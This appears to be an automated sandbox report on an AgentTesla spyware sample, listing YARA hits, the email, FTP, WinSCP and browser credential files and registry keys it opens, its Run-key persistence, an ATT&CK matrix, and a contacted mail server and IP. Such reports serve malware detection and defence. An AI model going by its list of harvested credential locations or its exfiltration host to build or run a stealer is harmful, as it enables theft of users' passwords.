                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3c27038.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44a0e18.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44d7038.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SlipMT103.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3bf0e18.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44d7038.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44a0e18.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3c27038.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3bf0e18.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3c27038.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44a0e18.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44d7038.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SlipMT103.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3bf0e18.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44d7038.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.kprUEGC.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.SlipMT103.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.kprUEGC.exe.44a0e18.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3c27038.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SlipMT103.exe.3bf0e18.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SlipMT103.exe PID: 6456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 2900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 988, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection12File and Directory Permissions Modification1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1Input Capture1Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Credentials in Registry1Security Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 528729 Sample: SlipMT103.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 5 other signatures 2->45 6 SlipMT103.exe 3 2->6         started        10 kprUEGC.exe 3 2->10         started        12 kprUEGC.exe 2 2->12         started        process3 file4 21 C:\Users\user\AppData\...\SlipMT103.exe.log, ASCII 6->21 dropped 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 6->47 49 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 6->49 14 SlipMT103.exe 2 5 6->14         started        51 Multi AV Scanner detection for dropped file 10->51 19 kprUEGC.exe 2 10->19         started        signatures5 process6 dnsIp7 29 mail.aquanova.es 51.83.52.225, 49830, 587 OVHFR France 14->29 23 C:\Users\user\AppData\Roaming\...\kprUEGC.exe, PE32 14->23 dropped 25 C:\Windows\System32\drivers\etc\hosts, ASCII 14->25 dropped 27 C:\Users\user\...\kprUEGC.exe:Zone.Identifier, ASCII 14->27 dropped 31 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->31 33 Tries to steal Mail credentials (via file / registry access) 14->33 35 Tries to harvest and steal ftp login credentials 14->35 37 3 other signatures 14->37 file8 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SlipMT103.exe40%ReversingLabsByteCode-MSIL.Trojan.NanoBot

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe40%ReversingLabsByteCode-MSIL.Trojan.NanoBot

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.0.SlipMT103.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      12.0.kprUEGC.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      12.0.kprUEGC.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      1.2.SlipMT103.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.SlipMT103.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      12.0.kprUEGC.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.SlipMT103.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      12.0.kprUEGC.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.SlipMT103.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      12.2.kprUEGC.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      12.0.kprUEGC.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      1.0.SlipMT103.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DrWvWz.com0%Avira URL Cloudsafe
                      http://defaultcontainer/Views/MainWindow.xaml0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://mail.aquanova.es0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://3jx9Nc9mcrIeyBPlhe.org0%Avira URL Cloudsafe
                      http://foo/Views/MainWindow.xaml0%Avira URL Cloudsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.aquanova.es
                      		51.83.52.225
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://api.ipify.org%GETMozilla/5.0kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://DynDns.comDynDNSkprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://DrWvWz.comkprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://defaultcontainer/Views/MainWindow.xamlkprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haSlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpfalse
                          		high
                          http://mail.aquanova.esSlipMT103.exe, 00000001.00000002.628449891.0000000002AFF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipSlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, SlipMT103.exe, 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://3jx9Nc9mcrIeyBPlhe.orgSlipMT103.exe, 00000001.00000002.628274243.0000000002AAE000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://foo/Views/MainWindow.xamlkprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://api.ipify.org%$SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          51.83.52.225
                          		mail.aquanova.esFrance
                          		16276OVHFRtrue

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:528729
                          Start date:25.11.2021
                          Start time:18:01:43
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 54s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:SlipMT103.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:25
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.adwa.spyw.evad.winEXE@7/5@1/1
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 92.122.145.220
                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528729/sample/SlipMT103.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          18:02:44API Interceptor749x Sleep call for process: SlipMT103.exe modified
                          18:03:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                          18:03:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                          18:03:25API Interceptor506x Sleep call for process: kprUEGC.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          51.83.52.225011#2022.exeGet hashmaliciousBrowse
                            ST#00321.exeGet hashmaliciousBrowse
                              #001245DOC.exeGet hashmaliciousBrowse
                                3eMNB.exeGet hashmaliciousBrowse
                                  File#BOL.exeGet hashmaliciousBrowse
                                    PE9j2qM.exeGet hashmaliciousBrowse
                                      Doc#$file.exeGet hashmaliciousBrowse
                                        Cceeoj9#234.exeGet hashmaliciousBrowse
                                          x02101BL6.exeGet hashmaliciousBrowse
                                            #Doc252501.exeGet hashmaliciousBrowse
                                              ls1w#doc.exeGet hashmaliciousBrowse
                                                file#0017.exeGet hashmaliciousBrowse
                                                  6ZDoc#0021.exeGet hashmaliciousBrowse
                                                    Doc3105.exeGet hashmaliciousBrowse
                                                      #Doc14$.exeGet hashmaliciousBrowse
                                                        FTG#00123.exeGet hashmaliciousBrowse
                                                          #doc010025$#.exeGet hashmaliciousBrowse
                                                            VsS28Z6.exeGet hashmaliciousBrowse
                                                              qUmVi#001.exeGet hashmaliciousBrowse
                                                                #LTINV0710.exeGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  mail.aquanova.es011#2022.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  ST#00321.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  #001245DOC.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  3eMNB.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  File#BOL.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  PE9j2qM.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  Doc#$file.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  Cceeoj9#234.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  x02101BL6.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  #Doc252501.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  ls1w#doc.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  file#0017.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  6ZDoc#0021.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  Doc3105.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  #Doc14$.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  FTG#00123.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  #doc010025$#.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  VsS28Z6.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  qUmVi#001.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225
                                                                  #LTINV0710.exeGet hashmaliciousBrowse
                                                                  • 51.83.52.225

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  OVHFRTT COPY_02101011.exeGet hashmaliciousBrowse
                                                                  • 213.186.33.5
                                                                  EzCOXP6oxy.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  IkroV40UrZ.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  C1Q17Dg4RT.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  or4ypx7EryGet hashmaliciousBrowse
                                                                  • 213.251.131.0
                                                                  MakbLShaqA.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  MakbLShaqA.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  COMPROBANTE DE CONSIGNACION #0000012992-882383393293293.vbsGet hashmaliciousBrowse
                                                                  • 149.56.200.165
                                                                  Ljm7n1QDZeGet hashmaliciousBrowse
                                                                  • 51.77.179.226
                                                                  SOA.exeGet hashmaliciousBrowse
                                                                  • 54.38.220.85
                                                                  Swift Copy TT.docGet hashmaliciousBrowse
                                                                  • 46.105.145.216
                                                                  tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  SecuriteInfo.com.ArtemisEC35A67F3663.5978.exeGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  4777_211122173928_001.xlsxGet hashmaliciousBrowse
                                                                  • 51.79.99.124
                                                                  xzmHphquAP.exeGet hashmaliciousBrowse
                                                                  • 51.79.119.231
                                                                  .#U266bvmail-478314QOZVOYBY30.htmGet hashmaliciousBrowse
                                                                  • 146.59.152.166
                                                                  pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234
                                                                  cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                  • 51.210.242.234

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SlipMT103.exe.log
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2239
                                                                  Entropy (8bit):5.354287817410997
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                  MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                  SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                  SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                  SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
